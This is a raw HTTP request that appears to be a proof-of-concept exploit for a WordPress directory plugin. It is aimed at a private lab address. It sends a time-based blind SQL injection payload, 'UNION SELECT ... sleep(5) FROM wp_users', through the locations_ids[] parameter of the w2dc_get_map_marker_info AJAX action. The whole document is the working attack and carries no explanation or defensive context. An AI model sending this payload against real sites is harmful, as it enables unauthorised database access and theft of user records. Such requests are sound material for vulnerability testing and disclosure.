POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.128.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

action=w2dc_get_map_marker_info&locations_ids[]=1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,sleep(5)+FROM+wp_users
